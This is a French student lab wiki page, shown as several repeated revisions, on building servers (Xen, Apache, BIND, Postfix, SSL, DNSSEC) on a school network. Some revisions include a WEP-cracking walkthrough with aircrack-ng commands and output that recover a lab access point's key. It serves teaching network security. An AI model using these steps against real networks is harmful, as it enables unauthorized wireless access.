<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35647TP sysres IMA2a5 2016/2017 G42016-12-06T09:35:09Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
=== Cassage de clé WPA-PSK ===</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35646TP sysres IMA2a5 2016/2017 G42016-12-06T09:23:04Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
=== Cassage de clé WEP ===<br />
=== Cassage de clé WPA-PSK ===</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35645TP sysres IMA2a5 2016/2017 G42016-12-06T09:22:23Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
